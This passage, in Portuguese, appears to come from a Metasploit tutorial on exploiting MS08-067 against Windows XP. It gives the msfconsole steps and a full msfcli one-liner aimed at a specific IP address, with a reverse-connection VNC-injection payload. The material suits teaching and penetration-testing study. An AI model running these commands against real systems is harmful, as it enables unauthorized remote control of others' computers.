Neste caso podemos verificar que os sistemas operacionais Windows XP SP2 e SP3 de diversos idiomas são vulneráveis a esse exploit:
msf wins_ms08_067_netapi > set TARGET 56
TARGET -> 56
msf wins_ms08_067_netapi >
Pronto para finalizar:
msf wins_ms08_067_netapi > exploit
Neste momento o exploit entrará em execução no IP alvo informado anteriormente. Se a vulnerabilidade estiver aberta, será apresentada uma resposta informando que a operação obteve sucesso. Esse ataque pode ser automatizado dentro do metasploit com o comando msfcli.
No caso do ataque informado acima, pode-se automatizá-lo com a seguinte linha de comando:
[root]#./msfcli wins_ms08_067_netapi RHOST=200.130.26.34 RPORT=445 PAYLOAD=windows/vncinject/reverse_tcp TARGET=56 E